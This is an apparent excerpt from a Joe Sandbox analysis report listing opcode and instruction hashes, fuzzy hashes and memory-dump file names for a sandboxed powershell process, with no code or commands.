                                  • Opcode ID: 3d4a04c6aea3e64eb8044c3c208c3726472c3f5fa32b4fc79b0e8e1157c95ab7
                                  • Instruction ID: f5bdb15f3b00e1ff2942d19d9135aee1b4a324a95c0f72a6a7042961bcd48569
                                  • Opcode Fuzzy Hash: 3d4a04c6aea3e64eb8044c3c208c3726472c3f5fa32b4fc79b0e8e1157c95ab7
                                  • Instruction Fuzzy Hash: A1C08C6024F3C10FC3134B3259106483FEE990319130E04EBE0C1CE0B3C418812CC32B
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274410271912.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_76e0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 78951cf45b08211a7793eec3f8c226e7a5b9f48fd624125c6c2144b76682e34e
                                  • Instruction ID: da1758af8895bdb23697d349f190bf0cc6efc624fd81b75c54628da71410b5e8
                                  • Opcode Fuzzy Hash: 78951cf45b08211a7793eec3f8c226e7a5b9f48fd624125c6c2144b76682e34e
                                  • Instruction Fuzzy Hash: 51A011B02000008BC200CA88C882820F320AB82208B28C0ACAA088F282CF23E8038A88
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3050000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0378e8f9bd42ad6501332f85c7af4c214bd7bfad822c656cf81ccec79bfddadb
                                  • Instruction ID: 9e3f6e6d13bae2769f6fcbc41122836589b0f5f02932c49c2417545e18852add
                                  • Opcode Fuzzy Hash: 0378e8f9bd42ad6501332f85c7af4c214bd7bfad822c656cf81ccec79bfddadb
                                  • Instruction Fuzzy Hash: F482E538A01218CFDB19DF60D895BADB772FF85305F5044A9DA062B390CB76AD8ACF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.274398626983.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_3050000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: o^$o^$o^$o^
                                  • API String ID: 0-2339528522
                                  • Opcode ID: 4f0b8bb51d862cc9e1d55f5f7b476e9ea5a1a8e911ca1aa171477ea5e884ef89
                                  • Instruction ID: b5ca185c90f804a40291f5c356e5f7391c7e3f9e2a7da4527c0fbac8fd96a6f0
                                  • Opcode Fuzzy Hash: 4f0b8bb51d862cc9e1d55f5f7b476e9ea5a1a8e911ca1aa171477ea5e884ef89
                                  • Instruction Fuzzy Hash: 7841C39680E7D11FD3074739A8A57867FB0AF632A5F0E00C7C4D4CF0A3E958985AC3A6